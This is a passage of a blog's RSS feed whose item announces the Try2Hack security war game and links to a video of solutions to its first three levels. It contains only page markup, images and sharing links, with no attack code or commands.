		<description><![CDATA[&#8220;Try2Hack War Game Challenge &#8220; ============================== &#160; &#160; TRY2HACK This site provides several security-oriented challenges for your entertainment. It is actually one of the oldest challenge sites still around &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=155&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h3 style="text-align:center;">&#8220;<span style="color:#ff0000;">Try2Hack</span> War Game <span style="color:#ff0000;">Challenge </span>&#8220;</h3>
<p style="text-align:center;">==============================<a href="http://lnxg33k.files.wordpress.com/2010/09/capture1.png"></a></p>
<p style="text-align:center;"><a href="http://lnxg33k.files.wordpress.com/2010/09/capture3.png"></a><a href="http://lnxg33k.files.wordpress.com/2010/09/capture4.png"><img class="aligncenter size-full wp-image-160" title="try2hack" src="http://lnxg33k.files.wordpress.com/2010/09/capture4.png?w=640" alt=""   /></a></p>
<p style="text-align:center;"><span id="more-155"></span></p>
<p style="text-align:left;">&nbsp;</p>
<p style="text-align:left;">&nbsp;</p>
<h1>TRY2HACK</h1>
<p>This site provides several security-oriented challenges for your  entertainment. It is actually one of the oldest challenge sites still  around <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p style="text-align:center;"><span style="text-align:center; display: block;"><a href="http://lnxg33k.wordpress.com/2010/09/12/video-try2hack-wargame-first-3-levels-solution/"><img src="http://img.youtube.com/vi/dLrR5t3-8n4/2.jpg" alt="" /></a></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/155/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=155&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2010/09/12/video-try2hack-wargame-first-3-levels-solution/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2010/09/capture4.png" medium="image">
			<media:title type="html">try2hack</media:title>
		</media:content>
	</item>
	</channel>
</rss>
